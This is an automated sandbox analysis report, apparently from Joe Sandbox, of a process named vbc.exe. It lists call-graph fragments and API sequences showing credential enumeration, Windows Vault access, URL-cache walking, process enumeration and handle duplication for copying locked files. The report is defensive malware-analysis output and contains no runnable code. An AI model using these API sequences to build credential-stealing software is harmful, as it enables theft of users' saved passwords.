212 API calls 36795->37131 36798 41260c memset memset memset 36807 414558 10 API calls 36798->36807 36802 4125c9 36818 4125d4 _wcsicmp 36802->36818 36804 412490 37114 411c61 36804->37114 36805 41247a 37217 4083d6 wcslen wcscat wcscpy wcscat 36805->37217 
36806 4122bd 36806->36763 37154 40299e 36806->37154 36820 412665 wcslen wcslen 36807->36820 36808 412587 36808->36789 36808->36798 36808->36802 36809 41242b 37202 411cdb memset wcslen wcslen 36809->37202 36810 4121b6 ExpandEnvironmentStringsW 37088 406a86 memset wcslen wcslen 36810->37088 36813 411f40 37132 411dd0 22 API calls 36813->37132 36815 412379 36815->36769 36829 40299e 172 API calls 36815->36829 36823 4125f5 36818->36823 36885 4125eb 36818->36885 36826 41269d 36820->36826 36827 412687 36820->36827 36821 4121b1 36821->36810 36844 4121d7 36821->36844 37220 4442f9 23 API calls 36823->37220 37222 408250 GetFileAttributesW 36826->37222 37221 4083d6 wcslen wcscat wcscpy wcscat 36827->37221 36828 4121de 37151 408d9f free free 36828->37151 36829->36769 36830 411c61 191 API calls 36830->36836 36831 411f90 37034 408d9f free free 36831->37034 36836->36781 36836->36808 36839 40299e 172 API calls 36839->36789 36840 412607 36840->36789 36841 4124e4 36848 411c61 191 API calls 36841->36848 36842 4124ce 37218 4083d6 wcslen wcscat wcscpy wcscat 36842->37218 36843 4126b6 36852 412737 36843->36852 36853 4126cd wcslen wcslen 36843->36853 36844->36828 37150 407991 212 API calls 36844->37150 36846 411fa1 36846->36831 37134 407991 212 API calls 36846->37134 36851 4124fe wcslen wcslen 36848->36851 36850->36762 36850->36763 36855 412522 36851->36855 36856 412538 36851->36856 37225 4442f9 23 API calls 36852->37225 36857 4126f1 36853->36857 36858 412707 36853->36858 37219 4083d6 wcslen wcscat wcscpy wcscat 36855->37219 36868 411c61 191 API calls 36856->36868 37223 4083d6 wcslen wcscat wcscpy wcscat 36857->37223 37224 408250 GetFileAttributesW 36858->37224 36859 411f59 36859->36831 37133 407991 212 API calls 36859->37133 36861 411fe1 36861->36765 37035 413424 36861->37035 36865 41274b 36867 412896 wcslen wcslen 36865->36867 36873 4128d0 36867->36873 36874 4128ba 36867->36874 36868->36836 36870 412000 37135 41367d _wcsicmp _wcsicmp 36870->37135 36872 412720 36872->36852 36879 412750 
memset wcslen wcslen 36872->36879 37257 408250 GetFileAttributesW 36873->37257 37256 4083d6 wcslen wcscat wcscpy wcscat 36874->37256 36875 41200a 36877 412016 memset memset memset memset 36875->36877 36878 412138 36875->36878 37136 408328 wcscpy wcsrchr 36877->37136 37142 413401 36878->37142 36883 412792 36879->36883 36884 4127a8 36879->36884 37226 4083d6 wcslen wcscat wcscpy wcscat 36883->37226 37227 409332 36884->37227 36885->36789 36885->36839 36886 412099 37137 408328 wcscpy wcsrchr 36886->37137 36890 4120a9 37138 408328 wcscpy wcsrchr 36890->37138 36892 4120b6 36892->36878 36894 4120bf wcslen wcslen 36892->36894 36895 4120e2 36894->36895 36896 4120f8 36894->36896 37139 4083d6 wcslen wcscat wcscpy wcscat 36895->37139 37140 408250 GetFileAttributesW 36896->37140 36897 412888 37253 409428 36897->37253 36903 412112 36903->36878 37141 407991 212 API calls 36903->37141 36904 412802 wcslen wcslen 36905 4127ed 36904->36905 36905->36897 36905->36904 36909 412860 36905->36909 37235 4092ee 36905->37235 37240 4083d6 wcslen wcscat wcscpy wcscat 36905->37240 37241 408250 GetFileAttributesW 36905->37241 37243 40938f 36905->37243 37242 4442f9 23 API calls 36909->37242 36911->36749 36912->36751 36913->36749 36914->36744 36916 40a959 36915->36916 37258 408d9f free free 36916->37258 36918 40a96c 37259 408d9f free free 36918->37259 36920 40a974 37260 408d9f free free 36920->37260 36922 40a97c 36923 408f1e free 36922->36923 36924 40a984 36923->36924 37261 40a420 memset 36924->37261 36929 408e6f 9 API calls 36930 40a9a7 36929->36930 36931 408e6f 9 API calls 36930->36931 36932 40a9b4 36931->36932 37290 40a56f 36932->37290 36936 40aa72 36945 40956d 36936->36945 36937 40aa6a 36938 403c2a 7 API calls 36937->36938 36938->36936 36943 40a9c2 36943->36936 36943->36937 36944 40a7da 18 API calls 36943->36944 37313 408c7e 36943->37313 36944->36943 37467 403b29 36945->37467 36948 409740 37475 403ba4 36948->37475 36949 4095ab 36949->36948 36953 4095b5 wcslen 36949->36953 36950 40959c 
CredEnumerateW 36950->36949 36953->36948 36954 4095e4 36953->36954 36954->36948 36955 4095ec wcsncmp 36954->36955 36958 40962b 36954->36958 36955->36954 36957 409665 memset 36957->36958 36959 40968f memcpy 36957->36959 36958->36954 36958->36957 36958->36959 37478 403bb9 LoadLibraryW GetProcAddress FreeLibrary 36958->37478 36960 4096f4 wcschr 36959->36960 36961 4096d7 _wcsnicmp 36959->36961 36962 4096eb 36960->36962 36961->36960 36961->36962 36962->36960 36963 409726 LocalFree 36962->36963 36963->36954 36964 40add0 37479 413acb 36964->37479 36967 40ae2c 36970 413acb FreeLibrary 36967->36970 36968 40adee GetProcAddress 36968->36967 36969 40ae08 36968->36969 36969->36967 36972 40ae18 36969->36972 36971 40ae31 36970->36971 36971->36777 37482 413b37 CoTaskMemFree 36972->37482 36974 40ae24 36975 413acb FreeLibrary 36974->36975 36976 413aff 36975->36976 36976->36777 37483 4443b0 36977->37483 36979 4445f6 36979->36757 36981 4443b0 8 API calls 36982 4444fc 36981->36982 36983 4445e2 36982->36983 37486 444369 GetVersionExW 36982->37486 36984 4443b0 8 API calls 36983->36984 36984->36979 36986 444551 memcmp 36990 44453d 36986->36990 36987 4445d8 36988 4443b0 8 API calls 36987->36988 36988->36983 36990->36986 36990->36987 36992 4443b0 8 API calls 36990->36992 37487 444456 8 API calls 36990->37487 37488 408d5f GetVersionExW 36990->37488 36992->36990 36994 4109d9 36993->36994 37489 410a52 36994->37489 36997 4109f0 37003 410a30 36997->37003 37503 4086ba CreateFileW GetFileTime CloseHandle 36997->37503 36998 410a46 37502 408d9f free free 36998->37502 37000 410a4e wcsrchr 37000->36784 37002 410a06 CompareFileTime 37002->36997 37003->36998 37004 40807e 2 API calls 37003->37004 37005 410a45 37004->37005 37005->36998 37007 414558 10 API calls 37006->37007 37008 410fd1 37007->37008 37009 414558 10 API calls 37008->37009 37010 410fdf wcslen wcslen 37009->37010 37011 41101d wcslen wcslen 37010->37011 37012 411006 37010->37012 37015 411064 wcslen wcslen 37011->37015 37016 41104d 
37011->37016 37551 4083d6 wcslen wcscat wcscpy wcscat 37012->37551 37019 411094 37015->37019 37020 4110ab 37015->37020 37552 4083d6 wcslen wcscat wcscpy wcscat 37016->37552 37553 4083d6 wcslen wcscat wcscpy wcscat 37019->37553 37022 410b8f 22 API calls 37020->37022 37023 4110c7 37022->37023 37024 410b8f 22 API calls 37023->37024 37025 4110d8 37024->37025 37534 411158 memset wcslen wcslen 37025->37534 37027 411149 37554 408d9f free free 37027->37554 37028 4110f8 memset 37032 4110ed 37028->37032 37030 411151 37030->36846 37031 40807e 2 API calls 37031->37032 37032->37027 37032->37028 37032->37031 37033 408e6f 9 API calls 37032->37033 37033->37032 37034->36861 37036 40b1bf free 37035->37036 37037 41343d CreateToolhelp32Snapshot memset Process32FirstW 37036->37037 37038 4135d8 Process32NextW 37037->37038 37039 41347d OpenProcess 37038->37039 37040 4135ef CloseHandle 37038->37040 37041 413588 37039->37041 37042 4134cb memset 37039->37042 37040->36870 37041->37038 37044 413597 free 37041->37044 37045 4080ac 3 API calls 37041->37045 37569 4135ff 37042->37569 37044->37041 37045->37041 37046 4134f7 37047 41350f GetModuleHandleW 37046->37047 37050 413542 QueryFullProcessImageNameW 37046->37050 37574 413031 37046->37574 37590 41337c 37046->37590 37047->37046 37049 41351e GetProcAddress 37047->37049 37049->37046 37050->37046 37052 41357a CloseHandle 37052->37041 37054 414558 10 API calls 37053->37054 37055 410dc0 37054->37055 37056 414558 10 API calls 37055->37056 37057 410dce wcslen wcslen 37056->37057 37058 410e0c wcslen wcslen 37057->37058 37059 410df5 37057->37059 37062 410e53 wcslen wcslen 37058->37062 37063 410e3c 37058->37063 37603 4083d6 wcslen wcscat wcscpy wcscat 37059->37603 37066 410e83 37062->37066 37068 410e9a 37062->37068 37604 4083d6 wcslen wcscat wcscpy wcscat 37063->37604 37605 4083d6 wcslen wcscat wcscpy wcscat 37066->37605 37069 410b8f 22 API calls 37068->37069 37070 410eb6 37069->37070 37071 410b8f 22 API calls 37070->37071 37072 410ec7 37071->37072 37073 
411158 35 API calls 37072->37073 37079 410edc 37073->37079 37074 410f38 37602 408d9f free free 37074->37602 37076 410ee7 memset 37076->37079 37077 410f40 memset 37081 413ea4 37077->37081 37078 40807e 2 API calls 37078->37079 37079->37074 37079->37076 37079->37078 37080 408e6f 9 API calls 37079->37080 37080->37079 37606 413e4f RegOpenKeyExW 37081->37606 37083 413eba 37084 41219e 37083->37084 37607 413e69 RegQueryValueExW 37083->37607 37084->36810 37149 408250 GetFileAttributesW 37084->37149 37086 413ed1 RegCloseKey 37086->37084 37089 406ad1 37088->37089 37090 406ae0 37088->37090 37608 4083d6 wcslen wcscat wcscpy wcscat 37089->37608 37609 408250 GetFileAttributesW 37090->37609 37093 406af8 37094 406b44 37093->37094 37095 406b01 memset 37093->37095 37094->36844 37610 408cac FindFirstFileW FindNextFileW FindClose 37095->37610 37097 406b31 37097->37094 37099 4144ab 2 API calls 37098->37099 37100 41456a 37099->37100 37101 41459d memset 37100->37101 37611 4083a1 37100->37611 37103 4145be 37101->37103 37614 413e4f RegOpenKeyExW 37103->37614 37106 41458e SHGetSpecialFolderPathW 37108 412458 wcslen wcslen 37106->37108 37107 4145eb 37109 41461e wcscpy 37107->37109 37615 4144da wcscpy 37107->37615 37108->36804 37108->36805 37109->37108 37111 4145fc 37616 413e69 RegQueryValueExW 37111->37616 37113 414613 RegCloseKey 37113->37109 37115 409332 9 API calls 37114->37115 37118 411c9c 37115->37118 37116 40938f 9 API calls 37116->37118 37117 411ccb 37119 409428 FindClose 37117->37119 37118->37116 37118->37117 37120 4092ee 2 API calls 37118->37120 37122 411cdb 182 API calls 37118->37122 37121 411cd6 wcslen wcslen 37119->37121 37120->37118 37121->36841 37121->36842 37122->37118 37124 414558 10 API calls 37123->37124 37125 401c77 wcslen wcslen 37124->37125 37126 401cad 37125->37126 37127 401c9e 37125->37127 37618 408250 GetFileAttributesW 37126->37618 37617 4083d6 wcslen wcscat wcscpy wcscat 37127->37617 37130 401cbb 37130->36808 37131->36813 37132->36859 37133->36859 37134->36846 
37135->36875 37136->36886 37137->36890 37138->36892 37139->36896 37140->36903 37141->36878 37143 413411 37142->37143 37144 413407 FreeLibrary 37142->37144 37145 40b1bf free 37143->37145 37144->37143 37146 41341a 37145->37146 37147 40b1bf free 37146->37147 37148 413422 37147->37148 37148->36765 37149->36821 37150->36844 37151->36850 37152->36779 37153->36806 37155 444b90 37154->37155 37156 4029ab memset CreateFileW 37155->37156 37157 402a06 FindCloseChangeNotification 37156->37157 37158 4029e6 37156->37158 37159 402a0d memset 37157->37159 37698 4080fd GetTempPathW 37158->37698 37619 408c5e WideCharToMultiByte 37159->37619 37162 4029f6 CopyFileW 37162->37159 37163 402a35 37620 44376f 37163->37620 37166 402c84 37167 402c9c 37166->37167 37168 402c8f DeleteFileW 37166->37168 37167->36763 37168->37167 37170 402a6e 37171 402c7c 37170->37171 37701 424adb 37170->37701 37678 4430da 37171->37678 37174 402a82 37175 402a87 memset 37174->37175 37176 402c77 37174->37176 37719 424cc3 17 API calls 37175->37719 37729 42483d 124 API calls 37176->37729 37179 424cc3 17 API calls 37184 402aa6 37179->37184 37183 408c93 MultiByteToWideChar 37183->37184 37184->37179 37184->37183 37720 424c52 16 API calls 37184->37720 37721 424ca3 16 API calls 37184->37721 37722 4028fb SystemTimeToFileTime FileTimeToLocalFileTime 37184->37722 37723 408c93 MultiByteToWideChar 37184->37723 37186 402b57 MultiByteToWideChar 37724 424c52 16 API calls 37186->37724 37191 424ca3 16 API calls 37196 402b81 37191->37196 37193 402be7 memset memcpy MultiByteToWideChar LocalFree 37193->37196 37194 40807e 2 API calls 37194->37196 37195 424adb 138 API calls 37195->37196 37196->37174 37196->37191 37196->37193 37196->37194 37196->37195 37725 4248d4 13 API calls 37196->37725 37726 424c52 16 API calls 37196->37726 37727 422b41 13 API calls 37196->37727 37728 403bb9 LoadLibraryW GetProcAddress FreeLibrary 37196->37728 37197->36787 37198->36815 37200 408092 memcpy 37199->37200 37201 40808f 37199->37201 37200->36809 37201->37200 
37203 411d29 37202->37203 37204 411d38 37202->37204 38070 4083d6 wcslen wcscat wcscpy wcscat 37203->38070 38068 408250 GetFileAttributesW 37204->38068 37207 411d4f 37208 411d69 wcslen wcslen 37207->37208 37209 40299e 172 API calls 37207->37209 37210 411d88 37208->37210 37211 411d97 37208->37211 37209->37208 38071 4083d6 wcslen wcscat wcscpy wcscat 37210->38071 38069 408250 GetFileAttributesW 37211->38069 37214 411daf 37215 411dc9 37214->37215 37216 40299e 172 API calls 37214->37216 37215->36830 37216->37215 37217->36804 37218->36841 37219->36856 37220->36840 37221->36826 37222->36843 37223->36858 37224->36872 37225->36865 37226->36884 37228 409428 FindClose 37227->37228 37229 40933e 37228->37229 37230 40807e 2 API calls 37229->37230 37231 409351 wcslen wcslen 37230->37231 37232 409378 37231->37232 37234 409381 37231->37234 38072 4083d6 wcslen wcscat wcscpy wcscat 37232->38072 37234->36905 37236 4092fa 37235->37236 37237 409329 37235->37237 37236->37237 37238 409301 wcscmp 37236->37238 37237->36905 37238->37237 37239 409318 wcscmp 37238->37239 37239->37237 37240->36905 37241->36905 37242->36905 37244 40939a FindFirstFileW 37243->37244 37245 4093bb FindNextFileW 37243->37245 37246 4093d6 37244->37246 37247 4093d1 37245->37247 37248 4093dd wcslen wcslen 37245->37248 37246->37248 37250 409416 37246->37250 37249 409428 FindClose 37247->37249 37248->37250 37251 40940d 37248->37251 37249->37246 37250->36905 38073 4083d6 wcslen wcscat wcscpy wcscat 37251->38073 37254 409431 FindClose 37253->37254 37255 40943b 37253->37255 37254->37255 37255->36867 37256->36873 37257->36885 37258->36918 37259->36920 37260->36922 37262 414558 10 API calls 37261->37262 37263 40a45a 37262->37263 37330 40a37f 37263->37330 37268 40a56a 37285 408e6f 37268->37285 37270 40a4a9 FindFirstUrlCacheEntryW 37271 40a562 37270->37271 37272 40a4ca wcschr 37270->37272 37361 409552 37271->37361 37274 40a50a FindNextUrlCacheEntryW 37272->37274 37275 40a4dd 37272->37275 37274->37272 37277 40a51f GetLastError 
37274->37277 37276 408e6f 9 API calls 37275->37276 37278 40a4ea wcschr 37276->37278 37279 40a559 FindCloseUrlCache 37277->37279 37280 40a52a 37277->37280 37278->37274 37281 40a4fb 37278->37281 37279->37271 37282 409539 2 API calls 37280->37282 37283 408e6f 9 API calls 37281->37283 37284 40a53d FindNextUrlCacheEntryW 37282->37284 37283->37274 37284->37272 37284->37279 37457 408e94 37285->37457 37288 408e90 37288->36929 37289 408dc5 7 API calls 37289->37288 37462 408d9f free free 37290->37462 37292 40a588 37463 413e4f RegOpenKeyExW 37292->37463 37294 40a599 37295 40a5a4 37294->37295 37296 40a6b5 37294->37296 37297 408ee8 4 API calls 37295->37297 37310 403c2a 37296->37310 37298 40a5be memset 37297->37298 37464 408f37 37298->37464 37301 40a617 37303 40a620 _wcsupr 37301->37303 37302 40a6ab RegCloseKey 37302->37296 37304 408dc5 7 API calls 37303->37304 37305 40a63e 37304->37305 37306 408dc5 7 API calls 37305->37306 37307 40a652 memset 37306->37307 37308 408f37 37307->37308 37309 40a68a RegEnumValueW 37308->37309 37309->37302 37309->37303 37311 403c8b 37310->37311 37312 403c2f 7 API calls 37310->37312 37311->36943 37312->37311 37314 40807e 2 API calls 37313->37314 37315 408c8c _wcslwr 37314->37315 37316 40a7da 37315->37316 37317 403c2a 7 API calls 37316->37317 37318 40a7f0 37317->37318 37319 40a8f7 wcslen 37318->37319 37320 40a815 wcslen 37318->37320 37319->36943 37321 403c2a 7 API calls 37320->37321 37322 40a82e 37321->37322 37323 40a8ed 37322->37323 37324 403c2a 7 API calls 37322->37324 37325 403c2a 7 API calls 37323->37325 37326 40a867 37324->37326 37325->37319 37326->37323 37327 40a884 memset 37326->37327 37328 40a8ab 37327->37328 37466 40a72f 9 API calls 37328->37466 37331 409332 9 API calls 37330->37331 37340 40a3bc 37331->37340 37332 40938f 9 API calls 37332->37340 37333 40a410 37335 409428 FindClose 37333->37335 37334 4092ee 2 API calls 37334->37340 37336 40a41b 37335->37336 37342 409ff2 memset memset 37336->37342 37337 40a3dd _wcsicmp 37339 40a3f4 37337->37339 
37337->37340 37338 40a37f 37 API calls 37338->37340 37364 40a230 22 API calls 37339->37364 37340->37332 37340->37333 37340->37334 37340->37337 37340->37338 37343 414558 10 API calls 37342->37343 37344 40a043 wcslen wcslen 37343->37344 37345 40a07e 37344->37345 37346 40a06b 37344->37346 37365 408250 GetFileAttributesW 37345->37365 37388 4083d6 wcslen wcscat wcscpy wcscat 37346->37388 37349 40a095 37350 40a09a wcslen wcslen 37349->37350 37351 40a0d3 37349->37351 37350->37351 37352 40a0bc 37350->37352 37366 408250 GetFileAttributesW 37351->37366 37389 4083d6 wcslen wcscat wcscpy wcscat 37352->37389 37354 40a0ea 37356 40a0fe 37354->37356 37367 409eb7 37354->37367 37356->37268 37358 409539 37356->37358 37359 409552 ??3@YAXPAX 37358->37359 37360 409541 ??2@YAPAXI 37359->37360 37360->37270 37362 409566 37361->37362 37363 409558 ??3@YAXPAX 37361->37363 37362->37268 37363->37362 37364->37340 37365->37349 37366->37354 37390 409a23 37367->37390 37369 409f98 37370 409fa1 DeleteFileW 37369->37370 37371 409fb5 37369->37371 37370->37371 37372 409552 ??3@YAXPAX 37371->37372 37374 409fc0 37372->37374 37373 409f26 37373->37369 37413 409b7a 37373->37413 37376 409fd1 37374->37376 37377 409fc9 CloseHandle 37374->37377 37379 40b1bf free 37376->37379 37377->37376 37378 409f78 37381 409f81 FindCloseChangeNotification 37378->37381 37382 409f89 37378->37382 37380 409fe0 37379->37380 37385 40b1bf free 37380->37385 37381->37382 37456 408d9f free free 37382->37456 37384 409f45 37384->37378 37433 409cb0 37384->37433 37386 409fe8 37385->37386 37386->37356 37388->37345 37389->37351 37391 405740 22 API calls 37390->37391 37393 409a41 37391->37393 37392 409b70 37392->37373 37393->37392 37394 40978a 68 API calls 37393->37394 37395 409a70 37394->37395 37395->37392 37396 409539 ??2@YAPAXI ??3@YAXPAX 37395->37396 37397 409a92 OpenProcess 37396->37397 37398 409b57 37397->37398 37399 409aa9 GetCurrentProcess DuplicateHandle 37397->37399 37403 405740 22 API calls 37398->37403 37406 409b65 37398->37406 
37400 409ad5 GetFileSize 37399->37400 37401 409b4f CloseHandle 37399->37401 37402 4080fd GetTempPathW GetWindowsDirectoryW GetTempFileNameW 37400->37402 37401->37398 37405 409aef 37402->37405 37403->37406 37404 409552 ??3@YAXPAX 37404->37392 37407 407d94 CreateFileW 37405->37407 37406->37404 37408 409af6 CreateFileMappingW 37407->37408 37409 409b10 MapViewOfFile 37408->37409 37410 409b45 CloseHandle CloseHandle 37408->37410 37411 409b40 FindCloseChangeNotification 37409->37411 37412 409b24 WriteFile UnmapViewOfFile 37409->37412 37410->37401 37411->37410 37412->37411 37414 409b91 37413->37414 37415 4060bc 11 API calls 37414->37415 37416 409ba4 37415->37416 37417 409bac memset 37416->37417 37418 409c9e 37416->37418 37420 409bed 37417->37420 37419 405ecf ??3@YAXPAX free 37418->37419 37421 409ca9 37419->37421 37422 4063bb 13 API calls 37420->37422 37423 409755 _wcsicmp 37420->37423 37424 40607f SetFilePointerEx ReadFile 37420->37424 37425 409c88 37420->37425 37429 40695a 8 API calls 37420->37429 37430 408ffd wcslen wcslen _memicmp 37420->37430 37431 409c49 _snwprintf 37420->37431 37421->37384 37422->37420 37423->37420 37424->37420 37426 409c96 37425->37426 37427 409c8d free 37425->37427 37428 408f1e free 37426->37428 37427->37426 37428->37418 37429->37420 37430->37420 37432 408dc5 7 API calls 37431->37432 37432->37420 37434 409cc7 37433->37434 37435 4060bc 11 API calls 37434->37435 37455 409cd8 37435->37455 37436 409ea5 37437 405ecf ??3@YAXPAX free 37436->37437 37439 409eb0 37437->37439 37438 4063bb 13 API calls 37438->37455 37439->37384 37440 40607f SetFilePointerEx ReadFile 37440->37455 37441 409e8e 37442 408f1e free 37441->37442 37444 409e96 37442->37444 37443 409755 _wcsicmp 37443->37455 37444->37436 37445 409e9c free 37444->37445 37445->37436 37446 409755 _wcsicmp 37447 409d7b memset 37446->37447 37448 408f43 6 API calls 37447->37448 37448->37455 37449 40695a 8 API calls 37449->37455 37450 409de5 memcpy 37450->37455 37451 409db8 wcschr 37451->37455 37452 409e00 
memcpy 37452->37455 37453 409e1b memcpy 37453->37455 37454 409e36 memcpy 37454->37455 37455->37436 37455->37438 37455->37440 37455->37441 37455->37443 37455->37446 37455->37449 37455->37450 37455->37451 37455->37452 37455->37453 37455->37454 37456->37369 37459 408e9a 37457->37459 37458 408e7f 37458->37288 37458->37289 37459->37458 37460 408eb6 wcscmp 37459->37460 37461 408eaf _wcsicmp 37459->37461 37460->37459 37461->37459 37462->37292 37463->37294 37465 408f3d RegEnumValueW 37464->37465 37465->37301 37465->37302 37466->37323 37468 403ba4 FreeLibrary 37467->37468 37469 403b31 LoadLibraryW 37468->37469 37470 403b42 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37469->37470 37471 403b9f 37469->37471 37472 403b8b 37470->37472 37471->36948 37471->36949 37471->36950 37473 403b91 37472->37473 37474 403ba4 FreeLibrary 37472->37474 37473->37471 37474->37471 37476 403bb4 37475->37476 37477 403baa FreeLibrary 37475->37477 37476->36964 37477->37476 37478->36958 37480 40addc LoadLibraryW 37479->37480 37481 413ad6 FreeLibrary 37479->37481 37480->36967 37480->36968 37481->37480 37482->36974 37484 444424 37483->37484 37485 4443b6 8 API calls 37483->37485 37484->36979 37484->36981 37485->37484 37486->36990 37487->36990 37488->36990 37490 410a66 37489->37490 37504 410c87 memset memset 37490->37504 37492 410b80 37517 408d9f free free 37492->37517 37494 410a84 memset 37499 410a6c 37494->37499 37495 4109df 37495->36997 37495->36998 37496 410aad wcslen wcslen 37496->37499 37497 4083d6 wcslen wcscat wcscpy wcscat 37497->37499 37498 410b10 wcslen wcslen 37498->37499 37499->37492 37499->37494 37499->37496 37499->37497 37499->37498 37500 408250 GetFileAttributesW 37499->37500 37501 408dc5 7 API calls 37499->37501 37500->37499 37501->37499 37502->37000 37503->37002 37505 414558 10 API calls 37504->37505 37506 410cd2 37505->37506 37518 407dd1 wcslen 37506->37518 37509 414558 10 API calls 37510 410cfb 37509->37510 37511 407dd1 2 API calls 37510->37511 37512 410d02 

Control-flow Graph (graph image not recoverable; entry block 40978a-4097f0; legend: Executed / Not Executed)
APIs
• memset.MSVCRT ref: 004097B2
  • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
  • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
  • Part of subcall function 004118EA: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
• _wcsicmp.MSVCRT ref: 004098B7
• _wcsicmp.MSVCRT ref: 004098CA
• _wcsicmp.MSVCRT ref: 004098DD
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 004098F1
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00409937
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00409946
• memset.MSVCRT ref: 00409964
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00409997
• _wcsicmp.MSVCRT ref: 004099B7
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 004099F7
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
• Instruction ID: 2b0fa152ef01bef0fcdaafddb1ab82311fd8af30ec04a4c20003f9f52c8fe1fb
• Opcode Fuzzy Hash: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
• Instruction Fuzzy Hash: 7B815E71900219EFEF10EF95C885AAEBBB5FF44305F20806EF905B6292D7399E41CB54
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not recoverable; entry block 4443b0-4443b4; legend: Executed / Not Executed)
APIs
• LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
• GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
• GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
• GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
• GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
• GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
• API String ID: 2238633743-2107673790
• Opcode ID: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
• Instruction ID: bae3ddfd5a2cf1e2657d78bbfe85c411ed61fca9aeaa9a4901361c1bc58423a9
• Opcode Fuzzy Hash: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
• Instruction Fuzzy Hash: 5201E874940B44EFEB306F71CD09E07BAE4EF94B117118D2EE49A92A10D778E818CE54
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00413442
                                                                                                                                                                        • memset.MSVCRT ref: 00413457
                                                                                                                                                                        • Process32FirstW.KERNEL32(?,?), ref: 00413473
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,00000000,?,?), ref: 004134B8
                                                                                                                                                                        • memset.MSVCRT ref: 004134DF
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413514
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0041352E
                                                                                                                                                                        • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 0041354F
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00413580
                                                                                                                                                                        • free.MSVCRT(-00000028), ref: 00413599
                                                                                                                                                                        • Process32NextW.KERNEL32(?,0000022C), ref: 004135E2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,0000022C), ref: 004135F2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
